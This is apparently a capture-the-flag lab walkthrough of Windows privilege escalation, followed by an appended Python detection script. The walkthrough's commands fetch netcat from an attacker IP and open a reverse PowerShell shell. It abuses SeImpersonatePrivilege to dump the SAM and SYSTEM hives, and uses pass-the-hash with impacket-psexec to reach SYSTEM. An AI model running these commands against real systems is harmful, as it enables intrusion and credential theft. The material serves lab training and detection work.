Priv Esc

PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami /all

USER INFORMATION
----------------

User Name        SID                                           
================ ==============================================
billyboss\nathan S-1-5-21-2389609380-2620298947-1153829925-1001


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> cd C:\programdata
PS C:\programdata> curl 192.168.45.233/nc.exe -o nc.exe
PS C:\programdata> ls


    Directory: C:\programdata


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d---s-        5/28/2020  10:01 PM                Microsoft                                                             
d-----        5/25/2020   9:07 AM                Microsoft OneDrive                                                    
d-----         5/9/2022   4:22 AM                Package Cache                                                         
d-----        5/25/2020   9:23 AM                Packages                                                              
d-----         5/9/2022   4:45 AM                regid.1991-06.com.microsoft                                           
d-----        3/18/2019   9:52 PM                SoftwareDistribution                                                  
d-----        5/26/2020   7:44 PM                ssh                                                                   
d-----        5/25/2020   8:44 PM                USOPrivate                                                            
d-----        5/25/2020   9:01 AM                USOShared                                                             
d-----         5/9/2022   4:23 AM                VMware                                                                
d-----        3/18/2019  11:23 PM                WindowsHolographicDevices                                                                                                   
-a----        8/16/2024   4:37 PM          59392 nc.exe                                                                                                                   


PS C:\programdata> 
PS C:\programdata> .\nc.exe 192.168.45.233 1338 -e powershell.exe

Moved to a more stable shell

PS C:\programdata> .\privme.exe -cmd "reg.exe save HKLM\SAM C:\programdata\sam.bak"

.\privme.exe -cmd "reg.exe save HKLM\SAM C:\programdata\sam.bak"
[*] CombaseModule: 0x140724306640896
[*] DispatchTable: 0x140724308983392
[*] UseProtseqFunction: 0x140724308351424
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\7cc4030a-5068-4863-939e-83cd9c76831a\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000fc02-0d40-ffff-87d4-c5ca2e8c7e24
[*] DCOM obj OXID: 0x438547efeb56b29c
[*] DCOM obj OID: 0xc7ce3d93195558de
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 832 Token:0x784  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1628
The operation completed successfully.
PS C:\programdata> 
PS C:\programdata> .\privme.exe -cmd "reg.exe save HKLM\SYSTEM C:\programdata\system.bak"
.\privme.exe -cmd "reg.exe save HKLM\SYSTEM C:\programdata\system.bak"
[*] CombaseModule: 0x140724306640896
[*] DispatchTable: 0x140724308983392
[*] UseProtseqFunction: 0x140724308351424
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\442203b4-d5fa-44a3-a116-2fcbae3095cf\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000f402-0fac-ffff-d895-26a1a0be0d6d
[*] DCOM obj OXID: 0x1df1e6bd5cea46d1
[*] DCOM obj OID: 0x723731170c8b4772
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 832 Token:0x784  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3384
The operation completed successfully.
$ impacket-psexec <user>@192.168.165.61 -hashes :f1777d139f9e8721780d5e94136b54ca
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra

[*] Requesting shares on 192.168.165.61.....
[*] Found writable share ADMIN$
[*] Uploading file njVKHnDx.exe
[*] Opening SVCManager on 192.168.165.61.....
[*] Creating service HvEA on 192.168.165.61.....
[*] Starting service HvEA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
fc41783718e1b5f8a1a39449590ba16b

C:\Windows\system32> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.165.61
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.165.254

C:\Windows\system32> 
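Three host-side artefacts in the transcript above are cheap to alert on: the `reg.exe save HKLM\SAM` / `HKLM\SYSTEM` command lines, the fake endpoint-mapper pipe created under a random GUID (`\pipe\<guid>\pipe\epmapper`, where the genuine RPCSS pipe is plain `\pipe\epmapper`), and the psexec-style service install (4-letter service name, 8-letter binary dropped into `ADMIN$`). The following detection code is an added example, not part of the original writeup; it runs over a constructed, simplified representation of Windows Security 4688/7045 and Sysmon 17 records (field names such as `command_line`, `pipe_name`, `service_name` and `image_path` are assumptions, not real export formats), modelled on the values shown in the transcript.

```python
"""Detection rules for the hive dump, the spoofed epmapper pipe and the
psexec-style service install seen in the transcript.  Events are a
constructed, simplified form of Security 4688 / 7045 and Sysmon 17 records."""

import re
from dataclasses import dataclass

# reg.exe save of a hive that yields local credential material.
HIVE_SAVE_RE = re.compile(
    r"reg(?:\.exe)?\s+save\s+\"?(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)\b",
    re.IGNORECASE,
)

# Impacket-style install as seen above: 4-letter service, 8-letter binary in %SystemRoot%.
PSEXEC_NAME_RE = re.compile(r"^[A-Za-z]{4}$")
PSEXEC_IMAGE_RE = re.compile(r"(?:%SystemRoot%|\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    user: str
    detail: str


def normalize_pipe(pipe_name: str) -> str:
    """Sysmon logs pipes as '\\epmapper'; other sources log '\\\\.\\pipe\\epmapper'.
    Reduce both to the Sysmon form, lower-cased, so one rule covers them."""
    prefix = r"\\.\pipe"
    if pipe_name.lower().startswith(prefix):
        pipe_name = pipe_name[len(prefix):]
    return pipe_name.lower()


def is_spoofed_epmapper(pipe_name: str) -> bool:
    """The real endpoint mapper is exactly '\\epmapper'.  A pipe whose path has
    extra components before a trailing '\\pipe\\epmapper' (e.g. a random GUID,
    as in the transcript) is a server planted to catch a SYSTEM connection."""
    return normalize_pipe(pipe_name).endswith(r"\pipe\epmapper")


def check_event(ev: dict):
    """Return a Finding for one event, or None if it matches no rule."""
    eid = ev["event_id"]
    if eid == 4688:  # process creation with command line
        m = HIVE_SAVE_RE.search(ev.get("command_line", ""))
        if m:
            return Finding("credential_hive_dump", ev["user"], f"hive={m.group(1).upper()}")
    elif eid == 17:  # Sysmon PipeCreated
        if is_spoofed_epmapper(ev.get("pipe_name", "")):
            return Finding("spoofed_epmapper_pipe", ev["user"], f"pipe={ev['pipe_name']}")
    elif eid == 7045:  # new service installed
        name, image = ev.get("service_name", ""), ev.get("image_path", "")
        if PSEXEC_NAME_RE.match(name) and PSEXEC_IMAGE_RE.search(image):
            return Finding("psexec_style_service", ev["user"], f"service={name} image={image}")
    return None


def detect(events):
    """Run every rule over a list of events and collect the findings."""
    return [f for f in map(check_event, events) if f is not None]


# Constructed sample events (modelled on the transcript, plus benign decoys).
SAMPLE_EVENTS = [
    {"event_id": 4688, "user": r"NT AUTHORITY\SYSTEM",
     "command_line": r"reg.exe save HKLM\SAM C:\programdata\sam.bak"},
    {"event_id": 4688, "user": r"NT AUTHORITY\SYSTEM",
     "command_line": r"reg.exe save HKLM\SYSTEM C:\programdata\system.bak"},
    {"event_id": 17, "user": r"NT AUTHORITY\NETWORK SERVICE",
     "pipe_name": r"\7cc4030a-5068-4863-939e-83cd9c76831a\pipe\epmapper"},
    {"event_id": 17, "user": r"NT AUTHORITY\NETWORK SERVICE", "pipe_name": r"\epmapper"},  # genuine RPCSS pipe
    {"event_id": 4688, "user": r"BILLYBOSS\nathan",
     "command_line": r"reg.exe query HKLM\SOFTWARE\Microsoft"},  # benign reg use
    {"event_id": 7045, "user": "SYSTEM", "service_name": "HvEA", "image_path": r"%SystemRoot%\njVKHnDx.exe"},
    {"event_id": 7045, "user": "SYSTEM", "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},  # benign service
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] user={f.user} {f.detail}")
```

The pipe rule is the one worth tuning: it keys on the shape of the path, not on a specific GUID, so it survives the per-run GUID change visible between the two tool invocations above. The hive-dump rule should be paired with file-creation monitoring on `*.bak` / `*.hiv` writes outside `%SystemRoot%`, since a copy made with `esentutl` or a volume shadow copy will not hit the `reg.exe save` pattern.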
